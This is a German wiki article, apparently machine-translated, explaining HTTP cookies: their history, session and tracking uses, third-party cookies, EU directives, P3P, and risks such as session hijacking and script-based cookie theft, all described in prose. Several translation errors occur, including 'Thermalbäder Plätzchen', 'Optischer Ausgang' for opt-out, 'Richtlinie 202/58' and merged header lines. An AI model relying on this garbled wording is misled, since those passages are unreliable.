in Definitionen, Wiki

Internet-Cookie: Was ist das? Definition, Ursprünge, Typen und Datenschutz

Welche Rolle spielt ein Cookie, was ist es und welche Arten von Cookies gibt es? 🍪

56.3K Views 384 Bewertungen

Internet-Cookie: Was ist das? Definition, Ursprünge, Typen und Datenschutz
Internet-Cookie: Was ist das? Definition, Ursprünge, Typen und Datenschutz

Un Cookie oder Web-Cookie (oder Plätzchen, abgekürzt als Zeuge in Quebec) wird durch das HTTP-Kommunikationsprotokoll als eine Folge von Informationen definiert, die von einem HTTP-Server an einen HTTP-Client gesendet werden, die letzterer jedes Mal zurücksendet, wenn derselbe HTTP-Server unter bestimmten Bedingungen abgefragt wird.

Das Cookie ist das Äquivalent zu a kleine Textdatei, die auf dem Endgerät gespeichert wird des Internetnutzers. Sie bestehen seit mehr als 20 Jahren und ermöglichen es Website-Entwicklern, Benutzerdaten zu speichern, um ihre Navigation zu erleichtern und bestimmte Funktionen zu ermöglichen. Cookies waren schon immer mehr oder weniger umstritten, weil sie persönliche Restinformationen enthalten, die möglicherweise von Dritten ausgenutzt werden können.

Sie wird vom Webserver als HTTP-Header an den Webbrowser gesendet, der sie bei jedem Zugriff auf den Server unverändert zurücksendet. Dazu kann ein Cookie verwendet werden eine Authentifizierung, eine Sitzung (Staatspflege), und für spezifische Informationen über den Benutzer speichernB. Website-Einstellungen oder der Inhalt eines elektronischen Einkaufswagens. Der Begriff Cookie leitet sich von ab magischer Keks, ein bekanntes Konzept im UNIX-Computing, das die Idee und den Namen von Browser-Cookies inspirierte. Es gibt einige Alternativen zu Cookies, jede mit ihren eigenen Verwendungszwecken, Vor- und Nachteilen.

Cookies sind als einfache Textdateien nicht ausführbar. Sie sind nicht weder Spyware noch Viren, obwohl Cookies von einigen Websites von vielen Antivirensoftware erkannt werden, da sie es ermöglichen, Benutzer zu verfolgen, wenn sie mehrere Websites besuchen. 

Die meisten modernen Browser ermöglichen Benutzern dies entscheiden, ob Cookies akzeptiert oder abgelehnt werden. Benutzer können auch Wählen Sie aus, wie lange Cookies gespeichert werden. Die vollständige Ablehnung von Cookies macht jedoch einige Seiten unbenutzbar. Speichern Sie beispielsweise Warenkörbe oder Websites, die eine Anmeldung mit Anmeldeinformationen (Benutzername und Passwort) erfordern.

Inhalt

Geschichte

Thermalbäder Plätzchen leitet sich vom englischen Begriff ab magischer Keks, ein Datenpaket, das ein Programm empfängt und unverändert zurückgibt. Cookies wurden in der IT bereits eingesetzt, als Lou Montulli hatte die Idee, sie in der Webkommunikation einzusetzen im Juni 1994. Damals war er bei Netscape Communications angestellt, das für einen Kunden eine E-Commerce-Anwendung entwickelt hatte. Cookies gaben eine Lösung für das Problem der Zuverlässigkeit der Implementierung eines virtuellen Einkaufswagens in einem Geschäft.

John Giannandrea und Lou Montulli schrieben im selben Jahr die erste Cookie-Spezifikation von Netscape. Version 0.9 Beta von Mosaic Netscape, veröffentlicht am 13. Oktober 1994, integriert Cookie-Technologie (siehe Beitrag). Die erste (nicht experimentelle) Verwendung von Cookies bestand darin, festzustellen, ob Besucher der Netscape-Website die Website zuvor besucht hatten. Montulli reichte 1995 eine Patentanmeldung für die Cookie-Technologie ein, und das US-Patent 5774670 wurde erteilt. 1998 gewährt.

Nach der Implementierung in Netscape 0.9 Beta im Jahr 1994 wurden Cookies in Internet Explorer 2 integriert, der im Oktober 1995 veröffentlicht wurde.

Die Einführung von Cookies ist der Öffentlichkeit noch nicht allgemein bekannt. Insbesondere wurden Cookies standardmäßig in den Browsereinstellungen akzeptiert und Benutzer wurden nicht über ihre Anwesenheit informiert. Einige Leute waren sich der Existenz von Cookies um das erste Quartal 1995 bewusst, aber die breite Öffentlichkeit nahm erst nach der Veröffentlichung eines Artikels der Financial Times am 12. Februar 1996 von ihrer Existenz Kenntnis. Im selben Jahr erhielten Cookies viel Medienaufmerksamkeit wegen möglicher Eingriffe in die Privatsphäre. Das Thema Cookies wurde in zwei Konsultationen der amerikanischen Federal Trade Commission in den Jahren 1996 und 1997 diskutiert.

Die Entwicklung der offiziellen Cookie-Spezifikation war bereits im Gange. Die ersten Diskussionen der offiziellen Spezifikation fanden im April 1995 auf der Mailingliste www-talk statt. Eine spezielle IETF-Arbeitsgruppe wurde gebildet. Zwei alternative Vorschläge zur Einführung von State-to-HTTP-Transaktionen wurden von Brian Behlendorf bzw. David Kristol vorgeschlagen, aber die von Kristol selbst geleitete Gruppe entschied sich, die Spezifikation von Netscape als Ausgangspunkt zu verwenden. Im Februar 1996 stellte die Arbeitsgruppe fest, dass Cookies von Drittanbietern eine erhebliche Bedrohung für die Privatsphäre darstellen. Die von der Gruppe erstellte Spezifikation wurde schließlich als veröffentlicht RFC 2109.

Ab Ende 2014 sehen wir auf vielen Websites ein Banner über Cookies. Es gibt mindestens eine Browsererweiterung, die das ermöglicht Banner nicht angezeigt.

Arten von Cookies und Verwendungen

Sitzungsverwaltung

Cookies können verwendet werden, um Benutzerdaten während der Navigation, aber auch über mehrere Besuche hinweg beizubehalten. Cookies wurden eingeführt, um elektronische Einkaufswagen zu implementieren, ein virtuelles Gerät, in dem der Benutzer die Artikel sammeln kann, die er kaufen möchte, während er auf der Website surft.

Heutzutage speichern Apps wie Einkaufswagen stattdessen die Liste der Artikel in einer Datenbank auf einem Server, was vorzuziehen ist; als sie im Cookie selbst zu speichern. Der Webserver sendet ein Cookie mit einer eindeutigen Session-ID. Der Webbrowser gibt diese Session-ID dann bei jeder weiteren Anfrage zurück und die Artikel im Warenkorb werden gespeichert und mit derselben eindeutigen Session-ID verknüpft.

Die häufige Verwendung von Cookies ist nützlich, um sich mit Anmeldeinformationen bei einer Website anzumelden. Kurz gesagt, der Webserver sendet zunächst ein Cookie, das eine eindeutige Sitzungs-ID enthält. Anschließend geben die Benutzer ihre Anmeldeinformationen ein (normalerweise einen Benutzernamen und ein Kennwort). Die Webanwendung authentifiziert dann die Sitzung und ermöglicht dem Benutzer den Zugriff auf den Dienst.

Personalisierung

Cookies können verwendet werden, um Informationen über den Benutzer einer Website zu speichern, um ihm in Zukunft geeignete Inhalte anzuzeigen. Beispielsweise kann ein Webserver ein Cookie senden, das den letzten Benutzernamen enthält, der zum Anmelden bei dieser Website verwendet wurde, sodass der Benutzername bei zukünftigen Besuchen vorbelegt werden kann.

Viele Websites verwenden Cookies zur Personalisierung basierend auf Benutzereinstellungen. Benutzer wählen ihre Präferenzen in einem Formular aus und übermitteln diese an den Server. Der Server codiert die Einstellungen in einem Cookie und sendet es an den Browser zurück. Anschließend sendet der Browser jedes Mal, wenn der Benutzer auf eine Seite dieser Website zugreift, das Cookie und damit die Liste der Einstellungen zurück; Der Server kann dann die Seite gemäß den Präferenzen des Benutzers anpassen. Zum Beispiel ermöglicht die Wikipedia-Website ihren Benutzern, den Skin der Website auszuwählen, den sie bevorzugen. Die Google-Suchmaschine ermöglicht ihren Nutzern (auch wenn sie nicht registriert sind), die Anzahl der Ergebnisse auszuwählen, die sie auf jeder Ergebnisseite sehen möchten.

Verfolgung

Tracking-Cookies werden verwendet, um die Surfgewohnheiten von Internetnutzern zu verfolgen. Dies kann teilweise auch durch Verwendung der IP-Adresse des Computers erfolgen, der eine Seite anfordert, oder durch Verwendung des „Referrer“-HTTP-Headers, den der Client bei jeder Anforderung sendet, aber Cookies ermöglichen eine größere Genauigkeit. Dies kann wie im folgenden Beispiel geschehen:

  1. Wenn der Benutzer eine Seite einer Website aufruft und die Anfrage kein Cookie enthält, geht der Server davon aus, dass dies die erste Seite ist, die der Benutzer besucht. Der Server erstellt dann eine zufällige Zeichenfolge und sendet sie zusammen mit der angeforderten Seite an den Browser.
  2. Ab diesem Moment wird das Cookie bei jedem Aufruf einer neuen Seite der Website automatisch vom Browser gesendet. Der Server sendet die Seite wie gewohnt, protokolliert aber auch die URL der aufgerufenen Seite, das Datum, die Uhrzeit der Anfrage und das Cookie in einer Protokolldatei.

Aus der Protokolldatei ist dann ersichtlich, welche Seiten der Nutzer in welcher Reihenfolge besucht hat. Wenn die Datei beispielsweise einige Anfragen enthält, die mit dem Cookie id=abc gestellt wurden, kann dies feststellen, dass alle diese Anfragen von demselben Benutzer stammen. Die angeforderte URL, das mit den Anforderungen verbundene Datum und die Uhrzeit ermöglichen es, das Surfen des Benutzers zu verfolgen.

Cookies und Web-Beacons von Drittanbietern, die unten erläutert werden, ermöglichen zusätzlich ein Tracking über verschiedene Websites hinweg. Das Single Site Tracking wird im Allgemeinen zu statistischen Zwecken verwendet. Im Gegensatz dazu wird das Tracking über verschiedene Websites mithilfe von Cookies von Drittanbietern im Allgemeinen von Werbeunternehmen verwendet, um anonyme Benutzerprofile zu erstellen (die dann verwendet werden, um zu bestimmen, welche Werbung dem Benutzer angezeigt werden soll, und um ihm entsprechende E-Mails zu senden – SPAM ).

Tracking-Cookies bergen die Gefahr, dass die Privatsphäre der Benutzer verletzt wird, sie können jedoch leicht gelöscht werden. Die meisten modernen Browser enthalten eine Option zum automatischen Löschen von dauerhaften Cookies beim Schließen der Anwendung.

Cookies von Drittanbietern

Bilder und andere Objekte, die in einer Webseite enthalten sind, können sich auf anderen Servern als dem befinden, auf dem die Seite gehostet wird. Um die Seite anzuzeigen, lädt der Browser all diese Objekte herunter. Die meisten Websites enthalten Informationen aus verschiedenen Quellen. Wenn Sie beispielsweise www.example.com in Ihren Browser eingeben, werden auf einem Teil der Seite häufig Objekte oder Anzeigen angezeigt, die aus anderen Quellen stammen, also aus einer anderen Domain als www.example.com. „Erstanbieter-Cookies“ sind Cookies, die von der in der Adressleiste des Browsers aufgeführten Domäne gesetzt werden. Cookies von Drittanbietern werden von einem der Seitenobjekte gesetzt, das von einer anderen Domäne stammt.

Standardmäßig akzeptieren Browser wie Mozilla Firefox, Microsoft Internet Explorer und Opera Cookies von Drittanbietern, aber Benutzer können die Einstellungen in den Browseroptionen ändern, um sie zu blockieren. Cookies von Drittanbietern, die Webfunktionen ermöglichen, beinhalten kein Sicherheitsrisiko, sie werden jedoch auch zur Verfolgung von Benutzern verwendet. von Ort zu Ort.

Tools wie Ghostery, die für alle Browser einschließlich Google Chrome verfügbar sind, können den Austausch zwischen Drittanbietern blockieren.

Implementierung

Eine mögliche Interaktion zwischen einem Webbrowser und dem Server, der die Webseite hostet. Der Server sendet ein Cookie an den Browser und der Browser sendet es zurück, wenn er eine andere Seite aufruft.
Eine mögliche Interaktion zwischen einem Webbrowser und dem Server, der die Webseite hostet. Der Server sendet ein Cookie an den Browser und der Browser sendet es zurück, wenn er eine andere Seite aufruft.

Cookies sind kleine Datenpakete, die vom Webserver an den Browser gesendet werden. Der Browser gibt sie unverändert an den Server zurück und führt den Zustand (Speicher vergangener Ereignisse) in die ansonsten zustandslose HTTP-Transaktion ein. Ohne Cookies ist jeder Abruf einer Webseite oder einer Komponente einer Webseite ein isoliertes Ereignis, unabhängig von anderen Anfragen an dieselbe Site. Neben der Möglichkeit, vom Webserver gesetzt zu werden, können Cookies auch von Skriptsprachen wie JavaScript gesetzt werden, sofern dies vom Browser unterstützt und zugelassen wird.

Die offizielle Cookie-Spezifikation schlägt vor, dass Browser in der Lage sein sollten, eine Mindestanzahl von Cookies zu speichern und erneut zu senden. Konkret sollte ein Browser in der Lage sein, mindestens 300 Cookies mit jeweils vier Kilobyte und mindestens 20 Cookies für einen einzelnen Server oder eine Domäne zu speichern.

Gemäß Ziffer 3.1 der RFC 2965, bei Cookie-Namen wird die Groß- und Kleinschreibung nicht beachtet.

Ein Cookie kann sein Ablaufdatum angeben, in diesem Fall wird das Cookie an diesem Datum gelöscht. Wenn das Cookie kein Ablaufdatum enthält, wird das Cookie gelöscht, sobald der Benutzer seinen Browser verlässt. Daher ist die Angabe eines Ablaufdatums eine Möglichkeit, das Cookie mehrere Sitzungen überstehen zu lassen. Aus diesem Grund spricht man von Cookies mit Ablaufdatum ausdauernd. Eine Beispielanwendung: Eine Einzelhandelswebsite verwendet möglicherweise dauerhafte Cookies, um die Artikel aufzuzeichnen, die Benutzer in ihren Einkaufswagen gelegt haben (in Wirklichkeit kann sich das Cookie auf einen Eintrag beziehen, der in einer Datenbank auf der Verkaufswebsite und nicht auf Ihrem Computer gespeichert ist). . Auf diese Weise können Benutzer, wenn sie ihren Browser verlassen, ohne einen Kauf getätigt zu haben, und später dorthin zurückkehren, die Artikel im Warenkorb wiederfinden. Wenn diese Cookies kein Ablaufdatum hätten, würden sie beim Schließen des Browsers ablaufen und die Information über den Inhalt des Warenkorbs wäre verloren.

Der Geltungsbereich von Cookies kann auf eine bestimmte Domain, Subdomain oder einen Pfad auf dem Server, der sie erstellt hat, beschränkt werden.

Die Übertragung von Webseiten erfolgt über das HyperText Transfer Protocol (HTTP). Durch das Ignorieren von Cookies rufen Browser eine Seite von Webservern auf, indem sie ihnen in der Regel einen kurzen Text senden, der aufgerufen wird HTTP-Anfrage. Um beispielsweise auf die Seite www.example.org/index.html zuzugreifen, verbinden sich Browser mit dem Server www.example.org und senden eine Anfrage, die wie folgt aussieht:

GET /index.html HTTP/1.1Host: www.example.org
Navigateurserveur

Der Server antwortet, indem er die angeforderte Seite sendet, der ein ähnlicher Text vorangestellt ist, wobei das Ganze aufgerufen wird HTTP-Antwort. Dieses Paket kann Zeilen enthalten, die den Browser anweisen, Cookies zu speichern:

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value
(HTML-Seite)
Navigateurserveur

Der Server sendet die Set-Cookie-Zeile nur, wenn der Server möchte, dass der Browser ein Cookie speichert. Set-Cookie ist eine Aufforderung an den Browser, die Name=Wert-Zeichenfolge zu speichern und bei allen zukünftigen Anfragen an den Server zurückzugeben. Wenn der Browser Cookies unterstützt und Cookies in den Browseroptionen aktiviert sind, wird das Cookie in alle nachfolgenden Anfragen an denselben Server eingeschlossen. Beispielsweise ruft der Browser die Seite www.example.org/news.html auf, indem er folgende Anfrage an den Server www.example.org sendet:

GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
Navigateurserveur

Dies ist eine Anforderung für eine andere Seite von demselben Server und unterscheidet sich von der ersten oben, da sie eine Zeichenfolge enthält, die der Server zuvor an den Browser gesendet hat. Dadurch weiß der Server, dass diese Anfrage mit der vorherigen verknüpft ist. Der Server antwortet, indem er die aufgerufene Seite sendet und ihr auch andere Cookies hinzufügt.

Der Wert des Cookies kann vom Server geändert werden, indem als Antwort auf die aufgerufene Seite eine neue Zeile Set-Cookie: name=new_value gesendet wird. Der Browser ersetzt dann den alten Wert durch den neuen.

Die Set-Cookie-Zeile wird normalerweise von einem CGI-Programm oder einer anderen Skriptsprache erstellt, nicht vom HTTP-Server. Der HTTP-Server (Beispiel: Apache) übermittelt lediglich das Ergebnis des Programms (ein Dokument, dem der Header mit den Cookies vorangestellt ist) an den Browser.

Cookies können auch durch JavaScript oder andere ähnliche Sprachen gesetzt werden, die im Browser ausgeführt werden, d. h. eher auf der Clientseite als auf der Serverseite. In JavaScript wird dazu das Objekt document.cookie verwendet. Beispielsweise erstellt die Anweisung document.cookie = "temperature=20" ein Cookie namens "temperature" und mit einem Wert von 20.

Beispiel einer HTTP-Antwort von google.com, die ein Cookie mit Attributen setzt.
Beispiel einer HTTP-Antwort von google.com, die ein Cookie mit Attributen setzt.

Ein Cookie kann neben dem Name/Wert-Paar auch ein Ablaufdatum, einen Pfad, einen Domainnamen und die Art der beabsichtigten Verbindung, also normal oder verschlüsselt, enthalten. RFC 2965 definiert auch, dass Cookies eine obligatorische Versionsnummer haben müssen, aber darauf wird im Allgemeinen verzichtet. Diese Datenteile folgen dem Paar name=new_value und werden durch Semikolons getrennt. Beispielsweise kann ein Cookie vom Server erstellt werden, indem eine Set-Cookie-Zeile gesendet wird: name=new_value; läuft ab=Datum; Pfad=/; domain=.beispiel.org.

Cookies verfallen und werden dann in den folgenden Situationen nicht vom Browser an den Server gesendet:

  • Wenn der Browser geschlossen wird, wenn das Cookie nicht persistent ist.
  • Wenn das Ablaufdatum des Cookies abgelaufen ist.
  • Wenn das Ablaufdatum des Cookies (durch den Server oder das Skript) auf ein Datum in der Vergangenheit geändert wird.
  • Wenn der Browser das Cookie auf Wunsch des Benutzers löscht.

Die dritte Situation ermöglicht es Servern oder Skripten, ein Cookie explizit zu löschen. Beachten Sie, dass es mit dem Google Chrome-Webbrowser möglich ist, das Ablaufdatum eines bestimmten Cookies zu erfahren, indem Sie auf die Inhaltseinstellungen zugreifen. Ein auf einem Computer gespeicherter Cookie kann durchaus mehrere Jahrzehnte dort verbleiben, wenn kein Verfahren zu seiner Löschung ergriffen wird.

Missverständnisse

Seit ihrer Einführung im Internet sind viele Ideen über Cookies im Internet und in den Medien verbreitet worden. Im Jahr 1998 stellte CIAC, ein Überwachungsteam für Computervorfälle des US-Energieministeriums, fest, dass Cookie-Sicherheitslücken „im Wesentlichen nicht vorhanden“ waren, und erklärte, dass „Informationen über den Ursprung Ihrer Besuche und die Details der von Ihnen besuchten Webseiten bereits in den Logfiles der Webserver vorhanden“. Im Jahr 2005 veröffentlichte Jupiter Research die Ergebnisse einer Studie, in der ein erheblicher Prozentsatz der Befragten die folgenden Aussagen berücksichtigte:

  • Kekse sind wie Virus, sie infizieren die Festplatten der Benutzer.
  • Cookies erzeugen Pop-up.
  • Zum Senden werden Cookies verwendet Spam.
  • Cookies werden nur für Werbezwecke verwendet.

Cookies können keine Informationen vom Computer des Benutzers löschen oder lesen. Cookies ermöglichen es jedoch, die von einem Benutzer auf einer bestimmten Website oder einer Gruppe von Websites besuchten Webseiten zu erkennen. Diese Informationen können in einem Benutzerprofil gesammelt werden, das verwendet oder an Dritte weiterverkauft werden kann, was zu ernsthaften Datenschutzproblemen führen kann. Einige Profile sind in dem Sinne anonym, dass sie keine personenbezogenen Daten enthalten, aber selbst solche Profile können fragwürdig sein.

Laut derselben Studie weiß ein großer Prozentsatz der Internetnutzer nicht, wie man Cookies löscht. Einer der Gründe, warum Menschen Cookies nicht vertrauen, ist, dass einige Websites den Aspekt der persönlichen Identifizierung von Cookies missbraucht und diese Informationen mit anderen Quellen geteilt haben. Ein großer Prozentsatz gezielter Werbung und unerwünschter E-Mails, die als Spam gelten, stammt aus Informationen, die aus Tracking-Cookies gewonnen werden.

Browsereinstellungen

Die meisten Browser unterstützen Cookies und erlauben dem Benutzer, sie zu deaktivieren. Die häufigsten Optionen sind:

  • Aktivieren oder deaktivieren Sie Cookies vollständig, sodass sie ständig akzeptiert oder blockiert werden.
  • Erlauben Sie dem Benutzer, die aktiven Cookies auf einer bestimmten Seite zu sehen, indem Sie Javascript: alert(document.cookie) in die Adressleiste des Browsers eingeben. Einige Browser enthalten einen Cookie-Manager für den Benutzer, der aktuell vom Browser gespeicherte Cookies anzeigen und selektiv löschen kann.

Die meisten Browser erlauben auch das vollständige Löschen personenbezogener Daten, einschließlich Cookies. Es gibt auch zusätzliche Module zur Steuerung von Cookie-Berechtigungen.

Datenschutz und Cookies von Drittanbietern

In diesem fiktiven Beispiel hat ein Werbeunternehmen auf zwei Websites Banner platziert. Durch das Hosten der Banner auf seinen Servern und die Verwendung von Cookies von Drittanbietern ist das Werbeunternehmen in der Lage, die Navigation des Benutzers durch diese beiden Websites zu verfolgen.

Cookies haben wichtige Auswirkungen auf die Privatsphäre und Anonymität von Webbenutzern. Obwohl Cookies nur an den Server zurückgesendet werden, der sie gesetzt hat, oder an einen Server, der derselben Internetdomäne angehört, kann eine Webseite jedoch Bilder oder andere Komponenten enthalten, die auf Servern anderer Domänen gespeichert sind. Die Cookies, die während der Wiederherstellung dieser externen Komponenten gesetzt werden, werden aufgerufen Cookies von Drittanbietern. Dazu gehören Cookies von unerwünschten Popup-Fenstern.

Werbeunternehmen verwenden Cookies von Drittanbietern, um Benutzer auf den verschiedenen von ihnen besuchten Websites zu verfolgen. Insbesondere kann ein werbendes Unternehmen einen Nutzer über alle Seiten verfolgen, auf denen es Werbebilder oder ein Tracking-Pixel platziert hat. Die Kenntnis der vom Benutzer besuchten Seiten ermöglicht es dem werbenden Unternehmen, die Werbepräferenzen des Benutzers gezielt auszurichten.

Die Möglichkeit, ein Benutzerprofil zu erstellen, wird von einigen als Verletzung der Privatsphäre angesehen, insbesondere wenn das Tracking über verschiedene Domänen hinweg mithilfe von Cookies von Drittanbietern erfolgt. Aus diesem Grund haben einige Länder Cookie-Gesetze.

Die Regierung der Vereinigten Staaten führte im Jahr 2000 strenge Regeln für die Platzierung von Cookies ein, nachdem bekannt wurde, dass das Drug Policy Office des Weißen Hauses Cookies verwendet, um die Computer von Benutzern zu verfolgen, die Online-Drogenwerbung ansehen. Im Jahr 2002 entdeckte der Datenschutzaktivist Daniel Brandt, dass die CIA dauerhafte Cookies auf Computern hinterließ, die ihre Websites besucht hatten. Nachdem die CIA über diesen Verstoß informiert wurde, erklärte sie, dass diese Cookies nicht absichtlich gesendet wurden, und stellte sie ein. Am 25. Dezember 2005 entdeckte Brandt, dass die National Security Agency (NSA) aufgrund eines Software-Updates zwei dauerhafte Cookies auf den Computern der Besucher hinterlassen hatte. Nach der Benachrichtigung hat die NSA Cookies sofort deaktiviert.

Im Vereinigten Königreich ist die Cookie-Gesetz “, die am 25. Mai 2012 in Kraft getreten ist, verpflichtet die Websites, ihre Absichten zu erklären, wodurch die Benutzer wählen können, ob sie Spuren ihrer Passage im Internet hinterlassen möchten oder nicht. Sie können somit vor zielgerichteter Werbung geschützt werden. Jedoch, gemäß The Guardian, ist die Zustimmung der Internetnutzer nicht unbedingt ausdrücklich; Es wurden Änderungen an den Bedingungen der Benutzereinwilligung vorgenommen damit impliziert.

Richtlinie 2002/58 zum Datenschutz

Die Richtlinie 202/58 Datenschutz und elektronische Kommunikation enthält Regeln zur Verwendung von Cookies. Insbesondere Artikel 5 Absatz 3 dieser Richtlinie verlangt, dass die Speicherung von Daten (z. B. Cookies) auf dem Computer des Benutzers nur erfolgen darf, wenn:

  • der Benutzer wird darüber informiert, wie die Daten verwendet werden;
  • dem Nutzer wird die Möglichkeit eingeräumt, dieser Speicherung zu widersprechen. Dieser Artikel besagt jedoch auch, dass die Speicherung von Daten aus technischen Gründen von diesem Gesetz ausgenommen ist.

Die ab Oktober 2003 umzusetzende Richtlinie wurde jedoch laut einem Bericht vom Dezember 2004, in dem auch darauf hingewiesen wurde, dass einige Mitgliedstaaten (Slowakei, Lettland, Griechenland, Belgien und Luxemburg) die Richtlinie noch nicht umgesetzt hatten, nur sehr unvollkommen in die Praxis umgesetzt Richtlinie in innerstaatliches Recht.

Nach Meinung der G29 aus dem Jahr 2010 wird diese Richtlinie, die insbesondere die Verwendung von Cookies für verhaltensbezogene Werbezwecke an die ausdrückliche Zustimmung des Internetnutzers bindet, noch immer sehr unzureichend angewendet. Tatsächlich tun die meisten Websites dies auf eine Weise, die nicht der Richtlinie entspricht, indem sie sich auf ein einfaches „Banner“ beschränken, das über die Verwendung von „Cookies“ informiert, ohne Informationen über die Verwendung zu geben, ohne zwischen „technischen“ Cookies zu unterscheiden. „Tracking“-Cookies, noch um dem Benutzer, der technische Cookies (wie z. Tatsächlich funktionieren viele Websites nicht richtig, wenn Cookies abgelehnt werden, was nicht der Richtlinie 2002/58 oder der Richtlinie 95/46 (Schutz personenbezogener Daten) entspricht.

Richtlinie 2009/136 / EG

Dieses Material wurde durch die Richtlinie 2009/136/EG vom 25. November 2009 aktualisiert, die besagt, dass die „Speicherung von Informationen oder der Zugang zu bereits gespeicherten Informationen im Endgerät eines Teilnehmers oder Benutzers nur unter der Bedingung gestattet ist, dass die Der Abonnent oder Benutzer hat seine Zustimmung gegeben, nachdem er in Übereinstimmung mit der Richtlinie 95/46/EG klare und vollständige Informationen zwischen anderen über die Zwecke der Verarbeitung erhalten hat“. Die neue Richtlinie stärkt daher die Verpflichtungen vor dem Setzen von Cookies auf dem Computer des Internetnutzers.

In den Vorüberlegungen zur Richtlinie präzisiert der europäische Gesetzgeber jedoch: „Wo dies technisch möglich und nach Maßgabe der einschlägigen Vorschriften der Richtlinie 95/46/EG sinnvoll ist, kann die Einwilligung des Nutzers in die Verarbeitung durch die erteilt werden Verwendung der entsprechenden Einstellungen eines Browsers oder einer anderen Anwendung“. Tatsächlich ermöglicht es jedoch bis heute kein Browser, die wesentlichen technischen Cookies von den optionalen Cookies zu trennen, die der Wahl des Benutzers überlassen werden sollten.

Diese neue Richtlinie wurde im Juli 2012 von belgischen Abgeordneten umgesetzt. Eine Studie aus dem Jahr 2014 zeigt, dass sogar Abgeordnete Schwierigkeiten haben, sie anzuwenden die Beschränkungen der Richtlinie.

P3P

Die P3P-Spezifikation beinhaltet die Möglichkeit für einen Server, eine Datenschutzrichtlinie anzugeben, die definiert, welche Art von Informationen er sammelt und zu welchem ​​Zweck. Diese Richtlinien umfassen (sind aber nicht beschränkt auf) die Verwendung von Informationen, die mithilfe von Cookies gesammelt werden. Gemäß den Definitionen von P3P kann ein Browser Cookies akzeptieren oder ablehnen, indem er die Datenschutzrichtlinien mit den Präferenzen des Benutzers vergleicht oder den Benutzer fragt und die vom Server deklarierte Datenschutzrichtlinie vorlegt.

Viele Browser, einschließlich Apple Safari und Microsoft Internet Explorer Version 6 und 7, unterstützen P3P, wodurch der Browser bestimmen kann, ob er die Speicherung von Cookies von Drittanbietern akzeptiert. Der Opera-Browser ermöglicht es Benutzern, Cookies von Drittanbietern abzulehnen und ein globales und spezifisches Sicherheitsprofil für Internetdomänen zu erstellen. Mozilla Firefox Version 2 hat die P3P-Unterstützung eingestellt, aber in Version 3 wieder eingeführt.

Cookies von Drittanbietern können von den meisten Browsern blockiert werden, um die Privatsphäre zu erhöhen und die Anzeigenverfolgung zu reduzieren, ohne das Weberlebnis des Benutzers zu beeinträchtigen. Viele Werbeagenturen bieten eine Option an Optischer Ausgang zu zielgerichteter Werbung, indem ein generisches Cookie im Browser eingerichtet wird, das dieses Targeting deaktiviert, aber eine solche Lösung ist praktisch nicht effektiv, wenn sie respektiert wird, da dieses generische Cookie gelöscht wird, sobald der Benutzer diese Cookies löscht, wodurch die Option aufgehoben wird aus Entscheidung.

Nachteile von Cookies

Neben Datenschutzproblemen haben Cookies auch einige technische Nachteile. Insbesondere identifizieren sie Benutzer nicht immer genau, sie können die Leistung der Website verlangsamen, wenn sie in großer Zahl vorhanden sind, sie können für Sicherheitsangriffe verwendet werden und sie stehen im Konflikt mit dem repräsentativen Zustandsübertragungs- und Architekturstil der Software.

Ungenaue Identifizierung

Werden mehr als ein Browser auf einem Computer verwendet, befindet sich in jedem von ihnen immer eine separate Speichereinheit für Cookies. Cookies identifizieren daher keine Person, sondern die Kombination aus einem Benutzerkonto, einem Computer und einem Webbrowser. Daher kann jeder diese Konten, Computer oder Browser mit einer Vielzahl von Cookies verwenden. Ebenso unterscheiden Cookies nicht zwischen mehreren Benutzern, die dasselbe Benutzerkonto, denselben Computer und denselben Browser verwenden, wie z. B. in „Internetcafés“ oder an Orten, die freien Zugang zu Computerressourcen bieten.

In der Praxis erweist sich diese Behauptung jedoch in den meisten Fällen als Trugschluss, da ein „Personal“-Computer (oder schlimmer noch ein Smartphone oder Tablet) heute hauptsächlich von einer einzelnen Person genutzt wird, was auf eine gezielte Nutzung einer bestimmten Person hinausläuft durch die Menge der gesammelten Informationen zu einem personalisierten Targeting, auch wenn die Person nicht „nämlich“ identifiziert ist.

Ein Cookie kann von einem anderen Computer im Netzwerk gestohlen werden.

Während des normalen Betriebs werden Cookies zwischen dem Server (oder einer Gruppe von Servern in derselben Domäne) und dem Computerbrowser des Benutzers zurückgesendet. Da Cookies sensible Informationen (Benutzername, ein zur Authentifizierung verwendetes Passwort usw.) enthalten können, sollten ihre Werte anderen Computern nicht zugänglich sein. Cookie-Diebstahl ist ein Akt des Abfangens von Cookies durch einen unbefugten Dritten.

Cookies können über einen Paket-Sniffer bei einem Angriff namens Session-Hijacking gestohlen werden. Der Datenverkehr im Netz kann von anderen Computern als den sendenden und empfangenden Computern abgefangen und gelesen werden (insbesondere im unverschlüsselten öffentlichen Wi-Fi-Bereich). Dieser Datenverkehr umfasst Cookies, die über Sitzungen mit dem einfachen HTTP-Protokoll gesendet werden. Wenn der Netzwerkverkehr nicht verschlüsselt ist, können böswillige Benutzer die Kommunikation anderer Benutzer im Netzwerk mit "Paketschnüfflern" lesen.

Dieses Problem kann überwunden werden, indem die Verbindung zwischen dem Computer des Benutzers und dem Server mit dem HTTPS-Protokoll verschlüsselt wird. Ein Server kann a angeben sichere Fahne beim Setzen eines Cookies; Der Browser sendet sie nur über eine sichere Leitung, z. B. eine SSL-Verbindung.

Obwohl viele Websites HTTPS-verschlüsselte Kommunikation für die Benutzerauthentifizierung verwenden (d. h. die Anmeldeseite), senden sie aus Effizienzgründen später Sitzungscookies und andere Daten wie gewohnt über unverschlüsselte HTTP-Verbindungen. Angreifer können so die Cookies anderer Benutzer abfangen und sich auf entsprechenden Seiten als diese ausgeben oder sie für Cookie-Angriffe verwenden.

Scripting in der Site: Ein Cookie, das nur zwischen dem Server und dem Client ausgetauscht werden soll, wird an einen anderen Drittanbieter gesendet.

Eine andere Möglichkeit, Cookies zu stehlen, besteht darin, Websites zu skripten und den Browser selbst Cookies an böswillige Server senden zu lassen, die sie nie empfangen. Moderne Browser erlauben die Ausführung gesuchter Codeteile vom Server. Wenn während der Laufzeit auf Cookies zugegriffen wird, können deren Werte in irgendeiner Form an Server übermittelt werden, die nicht darauf zugreifen sollen. Das Verschlüsseln von Cookies, bevor sie über das Netzwerk gesendet werden, hilft nicht, den Angriff zu vereiteln.

